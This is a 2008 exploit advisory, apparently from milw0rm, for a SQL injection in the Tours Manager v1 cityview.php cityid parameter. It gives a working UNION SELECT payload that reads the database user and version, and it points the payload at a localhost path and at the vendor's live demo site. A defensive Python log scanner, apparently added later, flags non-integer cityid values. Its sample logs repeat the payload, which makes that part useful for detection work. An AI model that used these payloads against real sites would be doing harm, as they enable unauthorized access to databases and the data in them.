-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                            IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Tours Manager v1 (cityview.php cityid) SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script: Tours Manager v1
[~] Language : PHP
[~] Website: http://www.toursmanager.com
[~] Type : Commercial
[~] Report-Date : 04/11/2008

--[ Founder ]--
G4N0K

--[ Exploit ]--
[+] http://localhost/[path]/cityview.php?cityid=-5+UNION+ALL+SELECT+1,2,3,concat(user(),0x3a,version()),5--

--[ L!ve ]--
[+] http://www.toursmanager.com/demo/cityview.php?cityid=-5+UNION+ALL+SELECT+1,2,3,concat(user(),0x3a,version()),5--

--[ Greetz ]--
[~] ALLAH
[~] Tornado2800
[~] Hussain-X

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-04]
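
For defenders, one way to find requests like the one above in web server logs, as an added example that is not part of the original advisory: it flags any cityview.php request whose cityid is not a plain integer. The combined log format, the assumption that a legitimate cityid is a short non-negative integer, the function names and the sample log lines are all constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate cityid is a short non-negative integer.
VALID_ID_RE = re.compile(r"[0-9]{1,10}")


def suspicious_cityid(line):
    """Return the decoded cityid value if the line is a cityview.php request
    whose cityid is not a plain integer; otherwise return None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/cityview.php"):
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    for value in parse_qs(url.query, keep_blank_values=True).get("cityid", []):
        if not VALID_ID_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_cityid) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_cityid(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample entries (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Nov/2008:10:00:01 +0000] "GET /demo/cityview.php?cityid=5 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [04/Nov/2008:10:00:09 +0000] "GET /demo/cityview.php?cityid=-5+UNION+ALL+SELECT+1,2,3,concat(user(),0x3a,version()),5-- HTTP/1.1" 200 4875',
    '192.0.2.10 - - [04/Nov/2008:10:00:15 +0000] "GET /demo/index.php?page=2 HTTP/1.1" 200 2210',
    '192.0.2.77 - - [04/Nov/2008:10:00:20 +0000] "GET /demo/cityview.php?cityid=7%27 HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer cityid {value!r}")
```

The same integer-only rule, enforced in cityview.php before the value reaches the query and combined with a parameterized statement, is the corresponding fix on the application side.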